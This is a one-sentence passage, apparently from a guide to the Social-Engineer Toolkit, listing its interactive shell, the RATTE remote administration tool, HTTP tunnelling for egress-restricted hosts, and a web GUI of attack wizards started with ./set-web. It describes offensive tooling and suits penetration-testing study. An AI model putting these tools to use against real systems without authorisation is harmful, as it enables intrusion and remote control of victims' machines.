These include the SET interactive shell, which can be used instead of meterpreter; the Remote Administration Tool (RATTE); HTTP tunnelling, for communicating with a host that only allows HTTP traffic out; and the WEB-GUI, which bundles the common attack and wireless attack wizards and is started with ./set-web.